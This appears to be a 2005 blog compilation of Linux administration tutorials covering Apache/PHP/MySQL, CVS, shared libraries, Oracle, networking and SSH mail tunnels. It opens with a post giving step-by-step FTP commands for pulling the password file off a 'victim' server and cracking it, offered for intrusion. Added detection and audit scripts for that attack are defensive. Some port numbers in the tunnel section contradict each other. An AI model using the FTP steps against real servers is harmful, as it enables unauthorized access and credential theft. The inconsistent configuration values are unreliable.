PROMO SELL

Thursday, March 10, 2005

Hacking a shell through FTP

The following is a way of hacking from Windows, used to obtain the password file from a shell. This method uses the FTP protocol. Most of the time the passwords are hidden/shadowed, but you can still get them by fingering or by guessing the password for the login.
You can start by opening/entering a shell, and you do not need to use or be inside an FTP server. Here are the steps:

1. Run the prompt
2. Type the command to open the DOS command prompt
3. Type ftp victim.com (the name of the server you want to hack!!)
4. A login prompt will appear.. just press enter (no need to type anything)
5. A password prompt will appear.. just press enter...
6. Now type "quote user ftp" and press enter
7. Then type "quote cwd ~root" and press enter
8. And type "quote pass ftp" and press enter
Now you have guest access and can download the password file.. and have a fuckin' shit with that
9. Type "cd etc" and press enter.. to get to the -etc directory- that contains the password file
10. Type "get passwd" to download the password file to your hard disk

With that we have the victim's password file, and we can open it at C:\passwd using Notepad.
If the file is encrypted.. you can crack it.. and if it is not encrypted.. it means you have succeeded.

You can match each user login with its password....

thanks
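
Seen from the server side, the sequence in steps 6 to 8 stands out because a CWD arrives between USER and PASS, before the login has completed, and is followed by a RETR of the account file. The script below is an added example, not part of the original post; the log format, the sample lines and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag suspicious FTP sessions in a command log.
# Constructed log format: "<time> <session-id> <C|S> <line>"
#   C = command sent by the client, S = reply sent by the server.
# Adapt the field positions to whatever your FTP daemon actually logs.

sample_log() {
cat <<'EOF'
10:00:01 s1 C USER alice
10:00:01 s1 S 331 Password required for alice.
10:00:02 s1 C PASS ********
10:00:02 s1 S 230 User alice logged in.
10:00:03 s1 C CWD pub
10:00:04 s1 C RETR readme.txt
10:05:10 s2 C USER ftp
10:05:10 s2 S 331 Guest login ok, send your email address as password.
10:05:11 s2 C CWD ~root
10:05:11 s2 S 530 Please login with USER and PASS.
10:05:12 s2 C PASS ftp
10:05:12 s2 S 230 Guest login ok, access restrictions apply.
10:05:13 s2 C CWD etc
10:05:14 s2 C RETR passwd
10:09:00 s3 C USER ftp
10:09:01 s3 C PASS guest@
10:09:01 s3 S 230 Guest login ok, access restrictions apply.
10:09:02 s3 C CWD ~bob
EOF
}

# Reads log lines on stdin and prints "<session> <RULE> <argument>".
#   PREAUTH_CWD        CWD sent before the server confirmed a login (230)
#   TILDE_CWD          CWD to a ~user home directory after login
#   ACCOUNT_FILE_RETR  download of a file named passwd or shadow
detect_ftp_anomalies() {
  awk '
    # A 230 reply marks the session as logged in.
    $3 == "S" && $4 == "230" { authed[$2] = 1; next }
    # Other server replies carry no state we track.
    $3 != "C" { next }
    {
      sid = $2; cmd = toupper($4); arg = $5
      # A new USER restarts authentication for the session.
      if (cmd == "USER") { authed[sid] = 0; next }
      if (cmd == "PASS" || cmd == "QUIT") next
      if (cmd == "CWD" && !authed[sid])
        print sid, "PREAUTH_CWD", arg
      else if (cmd == "CWD" && arg ~ /^~/)
        print sid, "TILDE_CWD", arg
      if (cmd == "RETR" && arg ~ /(^|\/)(passwd|shadow)$/)
        print sid, "ACCOUNT_FILE_RETR", arg
    }
  '
}

sample_log | detect_ftp_anomalies
```
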

Tuesday, March 08, 2005

Apache/PHP/MySQL with SSL Installation

# Move to /usr/local
cd /usr/local
# Get the following source:

ftp://ftp.openssl.org/source/openssl-0.9.7c.tar.gz
http://www.ibiblio.org/pub/mirrors/apache/httpd/httpd-2.0.48.tar.gz
http://www.linuxguruz.org/downloads/php-4.3.4.tar.gz
http://mysql.secsup.org/Downloads/MySQL-4.0/mysql-4.0.17.tar.gz



# Decompress the sources:
tar -xvzf openssl-0.9.7c.tar.gz
tar -xvzf httpd-2.0.48.tar.gz
tar -xvzf php-4.3.4.tar.gz
tar -xvzf mysql-4.0.17.tar.gz

# The sources were unpacked in /usr/local, so change into the tree from there
cd mysql-4.0.17
./configure
make
make install
scripts/mysql_install_db

adduser mysql
# In the file /etc/login.access add this line:
-:mysql:ALL
# So the user mysql never actually logs in

# For Slackware:
chown -R mysql.users /usr/local/var
# For Redhat:
chown -R mysql.mysql /usr/local/var

mysqld_safe --user=mysql &

# Hit
mysqladmin -u root password 'yourpasswordhere'

cd ../openssl-0.9.7c
sh config -fPIC
make
# If you get a "Not enough room for program headers" error here,
# install the LATEST version of binutils.

cd ../httpd-2.0.48
SSL_BASE=../openssl-0.9.7c ./configure --prefix=/usr/local/apache --enable-module=all --enable-ssl --enable-so
make

# Note: There is a Redhat bug that complains about mod_auth_dbm.so
# during the Apache `make` process. Adding the configuration
# switch --disable-module=auth_dbm to the end of the ./configure line
# will fix it.

# If you presently have a libphp4.so module you should make a backup:
cp /usr/local/apache/modules/libphp4.so /usr/local/apache/modules/libphp4.so.was

# If you have a file called /usr/local/apache/conf/httpd.conf already you
# should make a backup:
mv /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/httpd.conf.was

# This way you'll get a fresh httpd.conf with all your Apache modules listed
# and 100% loadable.

# Don't worry if your web server is presently running. The httpd.conf file
# is only read by the httpd binary when starting the web server.

make install

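# Now to create a "test certificate".
# 1024-bit RSA is only acceptable for a throwaway test key; use at least
# 2048 bits for a key that goes live.
cd /usr/local/apache/conf/
openssl genrsa -des3 -out ca.key 1024
# Note: In order to go live, the "Common Name" has to match the server's
# host address.
openssl req -new -x509 -days 365 -key ca.key -out ca.crt
openssl genrsa -des3 -out server.key 1024
# This step produces a certificate signing request (CSR), not a certificate,
# so it is written to server.csr. Assuming the downloaded sign.sh is the one
# from mod_ssl's contrib directory, signing server.csr writes server.crt.
openssl req -new -key server.key -out server.csr

wget http://www.linuxguruz.com/downloads/sign.sh
# sign.sh is fetched over plain HTTP: read it before making it executable.
chmod +x sign.sh
./sign.sh server.csr
chmod -x sign.sh
mkdir ssl.crt ssl.key
cp server.crt ssl.crt
cp server.key ssl.key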

#
cd ../php-4.3.4
./configure --with-apxs2=/usr/local/apache/bin/apxs --with-config-file-path=/usr/local/apache/conf --enable-versioning --with-mysql=/usr/local --enable-ftp --enable-bcmath --disable-debug --enable-memory-limit=yes --enable-track-vars
make
make install

# Make sure you have, Uncomment (remove the #'s), Change or Create
# the following lines in the file /usr/local/apache/conf/httpd.conf

# Apache 2.0 keeps its modules in modules/, the directory backed up above
LoadModule php4_module modules/libphp4.so


DirectoryIndex index.html index.php index.php3 index.phtml

# And for PHP 4.x, use:
#
AddType application/x-httpd-php .php .php3 .phtml
AddType application/x-httpd-php-source .phps

cp /usr/local/php-4.3.4/php.ini-dist /usr/local/apache/conf/php.ini

# Start Apache:
/usr/local/apache/bin/apachectl startssl

# Create a file in /usr/local/apache/htdocs called index.php
<html>
<head><title>PHP Test Page</title></head>
<body>
<? phpinfo(); ?>
</body>
</html>

# Point your Web Browser at:
http://localhost/index.php

Anyone who wishes to make additions or changes to this
PHP Tutorial email them to webmaster@linuxguruz.com

Apache/PHP/MySQL Installation

Title: Apache/PHP/MySQL Installation
Contributor: yudhax (aka Ranman)
Last Update: March 08 22:24 EST 2005

# Move to /usr/local
cd /usr/local

# Get the following source:

http://www.ibiblio.org/pub/mirrors/apache/httpd/httpd-2.0.48.tar.gz
http://www.linuxguruz.org/downloads/php-4.3.4.tar.gz
http://mysql.secsup.org/Downloads/MySQL-4.0/mysql-4.0.17.tar.gz

# Decompress the sources:
tar -xvzf httpd-2.0.48.tar.gz
tar -xvzf php-4.3.4.tar.gz
tar -xvzf mysql-4.0.17.tar.gz

# The sources were unpacked in /usr/local, so change into the tree from there
cd mysql-4.0.17
./configure
make
make install
scripts/mysql_install_db

adduser mysql
# In the file /etc/login.access add this line:
-:mysql:ALL
# So the user mysql never actually logs in

# For Slackware:
chown -R mysql.users /usr/local/var
# For Redhat:
chown -R mysql.mysql /usr/local/var

mysqld_safe --user=mysql &
# Hit
mysqladmin -u root password 'yourpasswordhere'

cd ../httpd-2.0.48
./configure --prefix=/usr/local/apache --enable-module=all --enable-so
make

# Note: There is a Redhat bug that complains about mod_auth_dbm.so
# during the Apache `make` process. Adding the configuration
# switch --disable-module=auth_dbm to the end of the ./configure line
# will fix it.

# If you presently have a libphp4.so module you should make a backup:
# (Apache 2.0 keeps its modules in modules/, not libexec/)
cp /usr/local/apache/modules/libphp4.so /usr/local/apache/modules/libphp4.so.was

# If you have a file called /usr/local/apache/conf/httpd.conf already, you
# should make a backup:
mv /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/httpd.conf.was

# This way you'll get a fresh httpd.conf with all your Apache modules listed
# and 100% loadable.

# Don't worry if your web server is presently running. The httpd.conf file
# is only read by the httpd binary when starting the web server.

make install

cd ../php-4.3.4
./configure --with-apxs2=/usr/local/apache/bin/apxs --with-config-file-path=/usr/local/apache/conf --enable-versioning --with-mysql=/usr/local --enable-ftp --with-gd --enable-bcmath --disable-debug --enable-memory-limit=yes --enable-track-vars
make
make install

# Make sure you have, Uncomment (remove the #'s), Change or Create
# the following lines in the file /usr/local/apache/conf/httpd.conf

# Apache 2.0 keeps its modules in modules/, not libexec/
LoadModule php4_module modules/libphp4.so


DirectoryIndex index.html index.php index.php3 index.phtml

# And for PHP 4.x, use:
#
AddType application/x-httpd-php .php .php3 .phtml
AddType application/x-httpd-php-source .phps

cp /usr/local/php-4.3.4/php.ini-dist /usr/local/apache/conf/php.ini

# Start Apache:
/usr/local/apache/bin/apachectl start

# Create a file in /usr/local/apache/htdocs called index.php
<html>
<head><title>PHP Test Page</title></head>
<body>
<? phpinfo(); ?>
</body>
</html>

# Point your Web Browser at:
http://localhost/index.php

Anyone who wishes to make additions or changes to this
PHP Tutorial email them to webmaster@linuxguruz.org

Copyright (c) 1999, 2000, 2001, 2002, 2003 and 2004 by LinuxGuru

Some notes on CVS

Setup and run the CVS server

Look for cvs services listed in /etc/services

# grep cvs /etc/services
cvspserver 2401/tcp # CVS client/server operations
cvspserver 2401/udp # CVS client/server operations
cvsup 5999/tcp CVSup # CVSup file transfer/John Polstra/FreeBSD
cvsup 5999/udp CVSup # CVSup file transfer/John Polstra/FreeBSD
#

Add cvs pserver to xinetd

# cd /etc/xinetd.d/
# cat cvspserver
service cvspserver
{
    socket_type = stream
    protocol = tcp
    wait = no
    user = root
    passenv =
    server = /usr/bin/cvs
    server_args = --allow-root=/cvs pserver -f
}

# /sbin/service xinetd restart

Adding CVS users and CVS passwd file

Used this perl script to generate a password ( you can also use htpasswd )

$ cat passwd.pl

#!/usr/bin/perl -w
# Reads passwords from stdin, one per line, and prints each one with its
# crypt() hash, using a random two-character salt.
$saltchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789./';
while (<>) {
    chomp $_;
    my ($salt) = substr($saltchars, rand(64), 1) . substr($saltchars, rand(64), 1);
    my ($c) = crypt($_, $salt);
    print "'$_' => '$c'\n";
}

Generate a password

$ ./passwd.pl
password
'password' => 'OKqq1ib8XEv2E'
$

Add the password into the password file

$ cd $CVSROOT/CVSROOT
$ cat passwd
cvs-user:OKqq1ib8XEv2E:
$
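
Each line of CVSROOT/passwd is user:hash[:system-user]. An empty hash field lets that user in with any password, and a 13-character hash like the one above is traditional DES crypt(3), which only uses the first eight characters of the password. The audit below is an added example, not part of the original notes; every sample entry except cvs-user, and the function names, are constructed.

```shell
#!/bin/sh
# Added example: audit a CVS pserver password file (CVSROOT/passwd).

# Constructed sample; only the cvs-user line comes from the notes above.
sample_cvs_passwd() {
cat <<'EOF'
cvs-user:OKqq1ib8XEv2E:
anon::cvsanon
build:$1$constructed$0123456789abcdefghijkl:cvsbuild
admin:OKqq1ib8XEv2E:root
EOF
}

# Reads passwd lines on stdin and prints "<cvs-user> <FINDING>".
#   EMPTY_PASSWORD  hash field is empty: any password is accepted
#   DES_CRYPT       13-character traditional crypt(3) hash: password is
#                   truncated to 8 characters and the salt is only 2
#   NO_SYSTEM_USER  third field missing: the server acts as the system
#                   account with the same name as the CVS user
#   RUNS_AS_ROOT    CVS user is mapped to the root system account
audit_cvs_passwd() {
  awk -F: '
    NF == 0 { next }
    {
      user = $1; hash = $2; sysuser = $3
      if (hash == "")
        print user, "EMPTY_PASSWORD"
      else if (length(hash) == 13 && hash !~ /^[$_]/)
        print user, "DES_CRYPT"
      if (sysuser == "")
        print user, "NO_SYSTEM_USER"
      else if (sysuser == "root")
        print user, "RUNS_AS_ROOT"
    }
  '
}

sample_cvs_passwd | audit_cvs_passwd
```

Run it against the real file with `audit_cvs_passwd < "$CVSROOT/CVSROOT/passwd"`.
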

Connecting to the CVS server
Login from another machine like this

$ cvs -d :pserver:cvs-user@serverbox.your.domain.com:/cvs login
(Logging in to cvs-user@serverbox.your.domain.com)
CVS password:
$

Or like this

$ setenv CVSROOT :pserver:cvs-user@serverbox.your.domain.com:/cvs
$ cvs login

Fixing some common CVS glitches

Got the following error:

cvs co -r open-source-product-121-trial-build open-source-product-121
cvs server: cannot open /root/.cvsignore: Permission denied
cvs [server aborted]: can't chdir(/root): Permission denied

Fixed by:

# unset HOME
# /etc/rc.d/init.d/inet restart
# /sbin/service xinetd restart

Or by : ( not recommended )

# chmod a+w /root
# chmod a+x /root


Sticky problems


problem:

$ cvs commit -m "adding new version" foobar.c
cvs server: sticky tag 'RELEASE-CANDIDATE-1' for file 'foobar.c' is not a branch
cvs [server aborted]: correct above errors first!
$

fix using an update:

$ cvs update -A foobar.c
M foobar.c
$
$ cvs commit -m "adding new version" foobar.c
Checking in package;
/your/open/source/program/foobar.c,v <-- foobar.c
new revision: 1.2; previous revision: 1.1
done
$


On HP-UX the remote shell is remsh, not rsh.

So you might need to add:

$ setenv CVS_RSH /bin/remsh


Some common CVS commands


$ cd /the/downloaded/open-source-product/121/source/base/
$ cvs import -m "open-source-product 1.2.1 source import" \
open-source-product-121 FOOBAR open-source-product121
$ cvs checkout open-source-product-121
U open-source-product-121/open-source-product/Makefile.in
....
$ cvs checkout open-source-product-121
$ cvs commit -m "Added FOOBAR specific changes"
Checking in open-source-product/nsprpub/configure;
/cvs/open-source-product-121/open-source-product/nsprpub/configure,v <-- configure
new revision: 1.2; previous revision: 1.1
done
$ cvs -q tag open-source-product-121-trial-build
$ cvs checkout -r open-source-product-121-trial-build open-source-product-121
$ mkdir build
$ cvs add build/
$ cvs -q tag open-source-product-121-trial-build
$ cvs tag -R open-source-product-121-trial-build
$ cvs co -r open-source-product-121-trial-build open-source-product-121

Sample Code - Using shared libs on UNIX

Sample C code for :

1. Creating a shared library
2. Runtime loading of a shared library
3. Calling a method from the loaded library


On GNU/Linux :

share.c

/*
* sample code for creating a shared library on GNU/Linux
*
* cc -fPIC -c share.c -o share.o
* ld -shared share.o -o share.sl
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/

#include <stdio.h>

void
share( int value )
{
    fprintf( stdout, "\nthe answer is %d\n", value );
}

------------ cut ----------

#cc -fPIC -c share.c -o share.o
#ld -shared share.o -o share.sl


main.c [ using dlopen(), dlsym() ]

coding ---

/*
* sample code for loading, calling a method from
* and unloading a shared library on GNU/Linux
*
* cc main.c -o main -ldl
*
* If using c++ compiler the symbol names will be mangled
* So a method called "share" will be "share__Fi" in the
* shared library, Please do a "nm share.sl" to find the
* mangled symbol for the method.
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>

int
main( void )
{
    /* dlopen() treats the name as a path only if it contains a '/'.
     * A bare "share.sl" would be looked up on the library search path
     * (LD_LIBRARY_PATH etc.), not in the current directory. */
    const char *sh_lib = "./share.sl" ;
    const char *method = "share";

    void (*fp) (int) = NULL ;
    void *handle = dlopen( sh_lib , RTLD_NOW );

    if( handle == NULL ){
        fprintf( stderr, "\nfailed loading %s\n", sh_lib );
        exit(1);
    }else{
        fp = ( void (*)(int) )dlsym( handle, method );
        if( fp == NULL )
            fprintf( stderr, "\nfailed getting method %s\n", method);
        else
            fp( 42 );
        if ( dlclose(handle) != 0 )
            fprintf( stderr, "\nfailed unloading %s\n", sh_lib );
    }

    exit(0);
}

----------------------- cut _------------------

cc main.c -o main -ldl


On HP-UX :

share.c

coding ---

/*
* sample code for creating a shared library on HP-UX
*
* cc +z -c share.c -o share.o
* ld -b share.o -o share.sl
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/

#include <stdio.h>

void
share( int value )
{
    fprintf( stdout, "\n\nthe answer is %d\n\n", value );
}


------------------------- cut -------------------------

cc +z -c share.c -o share.o
ld -b share.o -o share.sl


main.c [ using shl_load(), shl_findsym() ]

coding ---

/*
* sample code for loading , calling a method from
* and unloading a shared library on HP-UX
*
* cc main.c -o main
*
* If using a c++ compiler the symbol names will be mangled
* So a method called "share" will be "share__Fi" in the
* shared library, Please do a "nm share.sl" to find the
* mangled symbol for the method.
*
* kishan@hackorama.com ( www.hackorama.com ) Feb 2001
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <dl.h>

int
main( void )
{
    const char* sh_lib = "share.sl";
    const char* method = "share";

    void (*fp) ( int value ) = NULL ;
    shl_t handle = shl_load( sh_lib , BIND_IMMEDIATE , NULL );

    if( handle == NULL ){
        fprintf( stderr, "\nfailed loading %s\n", sh_lib);
        exit(1);
    }else{
        shl_findsym( &handle, method, TYPE_UNDEFINED, &fp );
        if( fp == NULL )
            fprintf( stderr, "\nfailed getting method %s\n", method);
        else
            fp( 42 );

        if ( shl_unload( handle ) != 0 )
            fprintf( stderr, "\nfailed unloading %s\n", sh_lib);
    }

    exit(0);
}

------------------------- cut ----------------------

cc main.c -o main


The linux sample code should work for other UNIX flavours, which use dlopen()/dlsym(). Only HP-UX uses shl_load()/shl_findsym(). Please look at the man pages of cc and ld for the correct flags to be used for the particular version of UNIX.

Oracle 8i on Linux

This is a step by step guide to installing Oracle8i on Linux. The installation was successfully tested on Suse 6.4 , Redhat 6.2 and Caldera openLinux 2.4 using Oracle 8i Enterprise Edition Release 2 (8.1.6) for Linux (Intel) circa October 2000.

1.Installation
2.Notes
3.Troubleshooting

1.Installation

Download Java 1.1.6 ( JRE ) for Linux from www.java.sun.com/linux or from blackdown.org, and Oracle 8i from oracle.com. If you have the Oracle 8i CD, download only the JRE.


[download the files to some directory like /tmp ]
$cd /tmp
$ls *.gz
jre_1.1.6-v5-glibc-x86.tar.gz
oracle8161_tar.gz

[ become root ]
$su

[ set up and install the jre ]
#cp /tmp/jre_1.1.6-v5-glibc-x86.tar.gz /usr/local/lib
#cd /usr/local/lib
#tar -xzvf jre_1.1.6-v5-glibc-x86.tar.gz
#ln -s /usr/local/lib/jre116_v5 /usr/local/lib/jre
#export PATH=$PATH:/usr/local/lib/jre/bin

[ create user groups ]
#/usr/sbin/groupadd -g 111 oinstall
#/usr/sbin/groupadd -g 112 dba

[ create a user named oracle ]
#mkdir /home/oracle
#/usr/sbin/useradd -g dba -d /home/oracle oracle
#/usr/sbin/usermod -g dba -G oinstall oracle
#passwd oracle
#chown oracle /home/oracle
#chgrp dba /home/oracle

[ make some directories required during installation ]
#mkdir -p /usr/local/oracle/8i && cd /usr/local/oracle/8i
#mkdir {u01,u02,u03,u04}
#chown oracle:oinstall {u01,u02,u03,u04}


[ become user oracle ]
#su oracle
$cd
$pwd
/home/oracle
$

[ Create/Edit the file named /home/oracle/.bashrc
with the following contents : ] [ SEE NOTE 2 ]

ORACLE_HOME=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5
ORACLE_BASE=/usr/local/oracle/8i/u01/app/oracle
export ORACLE_HOME ORACLE_BASE
NLS_LANG='english_united kingdom.we8iso8859p1'
ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data
ORACLE_TERM=vt100
LD_LIBRARY_PATH=$ORACLE_HOME/lib
PATH=$PATH:$ORACLE_HOME/bin:/usr/local/lib/jre/bin
export NLS_LANG ORA_NLS33 PATH LD_LIBRARY_PATH

$vi .bashrc
$source .bashrc

[ NO CD - unzip and extract the downloaded files ]
$gunzip /tmp/oracle8161_tar.gz
$tar -xvf /tmp/oracle8161_tar
$cd /tmp/Oracle8iR2/install/linux

[ WITH CD - If not mounted mount the CD ] [ SEE NOTE 1 ]
#su
#mount -t iso9660 /dev/hdc /cdrom
#exit
#su oracle
$cd /cdrom/install/linux


[ start installation ]
$./runInstaller

During installation the installation program will prompt you a couple of times to run certain commands as root from a shell. It will also ask you to create an SID at the end of the installation.

Post Install:

$svrmgrl
>connect internal
>startup

$export ORACLE_SID=your_sid_name
$sqlplus scott/tiger
SQL>
SQL>select ename from emp;

2.Notes
1. Mounting CD

The mount command might be a little different on different machines: the third parameter, the device file for the CDROM [ /dev/hdc ], may not be the same on all machines. Please contact your friendly sysadmin for help.

Or if you have an X desktop environment like Gnome or KDE you can click on the CDROM icon; it might mount the CDROM and open the CDROM contents in a file explorer.

Some Linux distributions ( like Caldera open Linux ) will have the CD auto mounted at /auto/cdrom. In that case you just go to that directory to access the installation files; you don't have to mount the CD.

2. Adding the .profile/.login/.bashrc

Usually the default shell for new user accounts on Linux is bash. So the file to add Oracle environment variables is usually .bashrc in the home directory /home/oracle. But if you are running another shell please contact your friendly sysadmin to find out which file to edit.

If you are not familiar with vi, please use any of the notepad-like editors: gedit, kedit, nedit.

3.Troubleshooting
1. Make sure you have set the Oracle environment variables correctly.

$su oracle
$cd
$pwd
/home/oracle
$source .bashrc
$env | grep -E 'ORACLE|NLS|LD'
NLS_LANG=english_united kingdom.we8iso8859p1
LD_LIBRARY_PATH=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5/lib
ORACLE_BASE=/usr/local/oracle/8i/u01/app/oracle
ORA_NLS33=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5/ocommon/nls/admin/data
ORACLE_HOME=/usr/local/oracle/8i/u01/app/oracle/product/8.1.5
$

Make sure the env command shows the above output, otherwise make sure you edited the /home/oracle/.bashrc file correctly.


2. Stale files from an aborted/failed installation

Sometimes the Oracle Universal Installer leaves behind stale files from an earlier failed installation as a different user.

One of the files left behind is /etc/oraInst.loc

#su
#cat /etc/oraInst.loc
inventory_loc=/home/user_name/oraInventory
inst_group=dba
#
[ where user_name is the user account from which the last failed installation was attempted ]

If you have this file hanging around you might get an error message saying no permissions to write /home/user_name/oraInventory . In that case become root and delete /etc/oraInst.loc file, and continue installation as user oracle.

SETTING UP NETWORK ON LINUX [ for DSL / LAN ]

This is a MINI HOW-TO on setting up the network configuration to connect your Linux box to a DSL network. It also applies to setting up your machine on a LAN.

The configuration instructions are specific to the Redhat Linux distro. There might be slight differences in the configuration files with other distros.


Get the IP Addresses

All you need from your DSL provider or your LAN sys-admin is the following set of IP addresses.

1. Your IP address

111.111.111.111

2. The Gateway IP address

222.222.222.222

3. The netmask

255.255.255.333

4. The DNS ( Primary and Secondary )

444.444.444.444
555.555.555.555

NOTE: The IP addresses above are just placeholders; please replace them with your actual IP addresses.


1.Set up your IP ( 111.111.111.111 )

* add the following line to /etc/hosts
111.111.111.111 hostname

* Eg: If your machine was called kahlua:

$cat /etc/hosts
127.0.0.1 localhost localhost.localdomain
111.111.111.111 kahlua


2.Set up Gateway ( 222.222.222.222 )


* Edit the /etc/sysconfig/network file with:
GATEWAY="222.222.222.222"

* Eg: If your machine was called kahlua:

$cat /etc/sysconfig/network
NETWORKING=yes
FORWARD_IPV4="yes"
HOSTNAME="kahlua"
GATEWAY="222.222.222.222"
GATEWAYDEV="eth0"

3. Set up the netmask ( 255.255.255.333 ) and IP ( 111.111.111.111 )

* Edit /etc/sysconfig/network-scripts/ifcfg-eth0 with:
IPADDR="111.111.111.111"
NETMASK="255.255.255.333"

* Eg: If your machine has IP 111.111.111.111 :

$ cat /etc/sysconfig/network-scripts/ifcfg-eth0
DEVICE="eth0"
IPADDR="111.111.111.111"
NETMASK="255.255.255.333"
ONBOOT="yes"
BOOTPROTO="none"
IPXNETNUM_802_2=""
IPXPRIMARY_802_2="no"
IPXACTIVE_802_2="no"
IPXNETNUM_802_3=""
IPXPRIMARY_802_3="no"
IPXACTIVE_802_3="no"
IPXNETNUM_ETHERII=""
IPXPRIMARY_ETHERII="no"
IPXACTIVE_ETHERII="no"
IPXNETNUM_SNAP=""
IPXPRIMARY_SNAP="no"
IPXACTIVE_SNAP="no"

4. Set up the DNS ( 444.444.444.444 and 555.555.555.555 )

* Edit /etc/resolv.conf and add:
nameserver 444.444.444.444
nameserver 555.555.555.555

* Eg: If your machine was called kahlua
and your providers domain is called dslinc.net :

$ cat /etc/resolv.conf
domain dslinc.net
search kahlua
nameserver 444.444.444.444
nameserver 555.555.555.555


Now you should be all set. Just ping any server on the net and verify if everything works fine.


For more information, please read the how-to docs NET-3-HOWTO / NET3-4-HOWTO in your /usr/doc/HOWTO ( normal path for Redhat distros ). Or search the newsgroup postings or Linux archives.

Installing ssh and sshd

Title: Installing ssh and sshd
Contributor: yudhax (neorganicz)
Last Update: Saturday March 20 01:30 EDT 2005


cd /usr/local

Get ftp://ftp.cis.fed.gov/pub/ssh/ssh-2.4.0.tar.gz

wget ftp://ftp.cis.fed.gov/pub/ssh/ssh-2.4.0.tar.gz
tar -xzvf ssh-2.4.0.tar.gz
cd ssh-2.4.0
./configure
make
make install


# In /etc/rc.d/rc.local:
# SSH Startup
echo Starting SSH Daemon
/usr/local/sbin/sshd

# Start sshd for the first time:
/usr/local/sbin/sshd

# You're done! Now just:
ssh machine_name

SSH Tunnel using POP3 for IMAP Mail

Who wants to read this
If you have a POP mail account on a remote server, provided by your ISP/work/school, and want to access your mail from your home/local machine through a secure channel.

Please note I will be referring to POP3 as just POP throughout this article.

Why Secure POP
Normal POP communication sends everything in clear text, including your mail account passwords. We need to use a secure channel, where everything will be encrypted between your local machine and the remote mail server. The rationale is analogous to the use of encrypted HTTPS versus normal HTTP communication when we access secure web services.

Check for IMAP with SSL support
IMAP with SSL encrypts the mail communications the same way HTTPS encrypts the website communications. Sadly not all mail servers support this. ( My ISP replied to me "at this time we do not provide SSL mail due to stability issues in current implementations" )

If you have SSL mail, all you need to do is configure your mail tool to use SSL. All the popular mail clients like Mozilla/Netscape Mail, Eudora, Outlook Express etc. support SSL. The SSL option may not be on by default, so please edit the Configuration/Settings of your mail client to use SSL.

On Mozilla 0.95/Netscape6.x Mail :

Select Menu:
Mail -> Mail & Newsgroups Account Settings
From the popup Dialog:
Select "Server Settings", Check "Use Secure connection (SSL) "
Select "Outgoing server (SMTP)" , Check "Always" for "Use secure connection ( SSL)"

If your remote server supports SSH
If you don't know much about SSH, please google the web for more information and then download and install SSH on your local machine. Most Linux machines should have it already installed.

If you already use SSH ( as a secure replacement for telnet/ftp ) and just want to know about POP through SSH then jump ahead to the SSH tunnelling section.

The following instructions are for Linux/Unix. But the concept is the same for other platforms as well. Instead of the command line invocations, you might use a GUI application.

Run ssh with the hostname or IP address of the mail server. If you get the following response you cannot use SSH.


$ ssh mail.remoteserver
ssh: connect to address xxx.xxx.xxx.xxx port 22: Connection refused
$

If you can connect to the remote server using SSH, then we can set up a secure tunnel through SSH for your POP communications. The tunnel connects a port on your local machine ( say 1234 ) to the POP3 port ( port 110 ) of your remote server.

$ ssh -P -f -L 1234:remoteserver:110 user@remoteserver sleep 25

-L specifies the port forwarding from 1234 on the local machine to 110 of remoteserver.
-f tells SSH to fork and run in the background.
-P option allows us to open a non privileged port - like 1234 - which does not require root access ( ports higher than 1024 ).

"sleep 25" is the command to execute at the remote server; as long as the command is executing at the server the tunnel will be kept open. In the example the connection will be open for 25 seconds; you can specify any duration to sleep.

This is called port forwarding in technical jargon, which means the local port on your machine will just forward any communication coming there to the POP server port. So in the mail tool when we configure the mail server name instead of the remoteserver:110 we will say localhost:12345

Now you have the POP tunnel to get your mail to your local machine. If you want to send mail through the SMTP server on the remote machine you can set up another secure tunnel to the SMTP port ( port 25 ) of the remote mail server as follows.



$ ssh -P -f -L 1235:remoteserver.net:25 user@remoteserver sleep 25

Test the tunnel
Once you have set up the tunnels as explained above, test whether they are connecting correctly by telnetting to the tunnel ports.

First test the incoming POP tunnel. After connecting, if you see the name of your remote server then your tunnel is working. Press the escape character "ctrl+]" to get to the telnet prompt and then type "close" to exit.



$ telnet localhost 1234
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
+OK QPOP (version 3.1.2) at remoteserver.net starting.
^]

telnet> close
Connection closed.
$

Now check the same for the outbound tunnel. Type "quit" to close the connection.



$ telnet localhost 1235
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 remoteserver.net ESMTP Sendmail 8.8.6/8.8.2; Thu, 6 Dec 2001 22:24:54 -0800

quit
Connection closed by foreign host.
$

Mail tool configuration
In the settings/configuration for the incoming POP server please specify localhost as the server and 1234 as the port. For the outgoing SMTP mail server please specify localhost and 4321 as the server and the port. And make sure you enable the tunnels before getting or sending mail.

One click tunnelling
I have put the above commands into shell scripts for convenience. And to make it even easier I have created a desktop shortcut on my Linux workstation, which will bring up the scripts inside a small xterm window. So whenever I need to get or send mail, I just click on the desktop icon and type in the password/passphrase on the xterm that pops up with the tunnel script.

These are the scripts I use; you can either use these or create your own to suit your needs.





$ cat getmail.sh

#!/bin/sh
DELAY=300
# List any ssh tunnel already running on port 1234
ps -ef | grep -i ssh | grep 1234 | grep -v grep | grep -v sshd
echo ""
ssh -P -f -L 1234:mail.foo.net:110 user@foo.net sleep $DELAY
# Keep the xterm open for as long as the tunnel lives
sleep $DELAY
$


$ cat putmail.sh

#!/bin/sh
DELAY=300
# List any ssh tunnel already running on port 1235
ps -ef | grep -i ssh | grep 1235 | grep -v grep | grep -v sshd
echo ""
ssh -P -f -L 1235:mail.foo.net:25 user@foo.net sleep $DELAY
sleep $DELAY
$


$ cat tunnel.sh

#!/bin/sh
# One small xterm per tunnel; the -T title shows which ports it carries
xterm -geometry 60x5+60+10 -bg red -fg white -T \
    'local:1234]==[110:mail.foo.net]' -e /home/foo/bin/getmail.sh &
